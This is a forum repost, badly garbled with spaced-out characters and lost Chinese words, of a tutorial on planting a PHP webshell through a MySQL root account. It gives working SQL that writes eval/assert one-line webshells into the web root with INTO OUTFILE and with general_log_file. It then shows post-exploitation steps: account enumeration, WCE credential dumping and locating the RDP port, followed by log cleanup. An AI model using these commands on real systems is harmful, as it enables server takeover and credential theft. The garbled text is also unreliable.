搜索

[20879] 2017-08-29_[【转载】]Mysqlroot账号general_log_file方法获取webshell

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2017-08-29_[【转载】]Mysqlroot账号general_log_file方法获取webshell [ ]   M y s q l   r o o t g e n e r a l _ l o g _ f i l e w e b s h e l l L e m o n S e c   2 0 1 7 - 0 8 - 2 9 M y s q l   r o o t g e n e r a l _ l o g _ f i l e w e b s h e l l   b y         p h p m y a d m i n r o o t w e b s h e l l M y s q l r o o t w e b s h e l l w e b s h e l l 1 .       访 1 使 p h p S t u d y 2 0 1 4 p h p i n f o D : / p h p S t u d y / W W W W i n d o w s   S e r v e r   2 0 0 3   p h p s t u d y D : / p h p S t u d y / W W W / l . p h p 1 2 . r o o t       p h p S t u d y r o o t / r o o t 使 使 p h p m y a d m i n 2 使 w w w m y s q l u s e r 3
2 r o o t 3   m y s q l u s e r 使 3 . w e b s h e l l       D : / p h p S t u d y / W W W r o o t w e b s h e l l s e l e c t   ' < ? p h p @ e v a l ( $ _ P O S T [ c m d ] ) ; ? > ' I N T O   O U T F I L E   ' D : / p h p S t u d y / W W W / c m d . p h p ' 4 w e b s h e l l T h e   M y S Q L   s e r v e r   i s   r u n n i n g   w i t h   t h e   - - s e c u r e - f i l e - p r i v   o p t i o n   s o   i t   c a n n o t   e x e c u t e   t h i s   s t a t e m e n t M y s q l - - s e c u r e - f i l e - p r i v
4 w e b s h e l l 4 .   s e c u r e _ f i l e _ p r i v       m y s q l 使 s e c u r e _ f i l e _ p r i v w e b s h e l l 使 m y d a t a . u s e r s e l e c t   *   f r o m   m y d a t a . u s e r   i n t o   o u t f i l e   ' / h o m e / m y s q l / u s e r . t x t ' ; m y s q l - - s e c u r e - f i l e - p r i v = n a m e   L i m i t   L O A D   D A T A ,   S E L E C T   . . .   O U T F I L E ,   a n d   L O A D _ F I L E ( )   t o   f i l e s   w i t h i n   s p e c i f i e d d i r e c t o r y 1 m y s q l d           m y s q l d   - - s e c u r e _ f i l e _ p r i v e = n u l l 2 m y s q l d / t m p /           m y s q l d   - - s e c u r e _ f i l e _ p r i v = / t m p / 3 m y s q l d   / e t c / m y . c n f 5 . g e n e r a l _ l o g g e n e r a l _ l o g _ f i l e w e b s h e l l       m y s q l g e n e r a l   l o g g e n e r a l   l o g g e n e r a l   l o g g e n e r a l   l o g g e n e r a l _ l o g _ f i l e g e n e r a l _ l o g g e n e r a l _ l o g _ f i l e p h p g e n e r a l _ l o g _ f i l e 访 g e n e r a l _ l o g _ f i l e w e b s h e l l m y s q l s e t   g l o b a l   g e n e r a l _ l o g = ' o n ' ; S E T   g l o b a l   g e n e r a l _ l o g _ f i l e = ' D : / p h p S t u d y / W W W / c m d . p h p ' ; S E L E C T   ' < ? p h p   a s s e r t ( $ _ P O S T [ " c m d " ] ) ; ? > ' ;       5 6 7 g e n e r a l _ l o g g e n e r a l _ l o g _ f i l e 5 g e n e r a l _ l o g
6 g e n e r a l _ l o g _ f i l e 7 w e b s h e l l 6 . w e b s h e l l       h t t p : / / * * * * * * . h y * * * * * * . c n / c m d . p h p 8 m y s q l c m d . p h p w e b s h e l l 9 8
9 w e b s h e l l 7 .     1     1 0 w h o m a i n e t   u s e r n e t   l o c a l g r o u p a d m i n i s t r a t o r 1 0 2 w c e         g 8 6 . e x e 1 1 g 6 4 . e x e 3 2
1 1 8 .       t a s k l i s t   / s v c   |   f i n d   " T e r m S e r v i c e " n e t s t a t   - a n o   |   f i n d   " 1 7 9 2 "   3 3 8 9 8 3 6 9 t a s k l i s t   / s v c   |   f i n d " T e r m S e r v i c e " n e t s t a t   - a n o   |   f i n d   " 1 7 9 2 " 1 7 9 2 1 7 9 2 1 2 3 3 8 9 9 . 3 3 8 9     m s t s c 2 0 2 . 5 8 . * * * . * * * : 8 3 6 9 1 3 1 3 3 3 8 9 1 0 . 1 g e n e r a s h o w   g l o b a l   v a r i a b l e s   l i k e   " % g e n e r a % " ; 2 g e n e r a l _ l o g
s e t   g l o b a l   g e n e r a l _ l o g = o f f ; 3 g e n e r a l _ l o g w e b s h e l l s e t   g l o b a l   g e n e r a l _ l o g = ' o n ' ; S E T   g l o b a l   g e n e r a l _ l o g _ f i l e = ' D : / p h p S t u d y / W W W / c m d . p h p ' ; S E L E C T   ' < ? p h p   a s s e r t ( $ _ P O S T [ " c m d " ] ) ; ? > ' ;
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理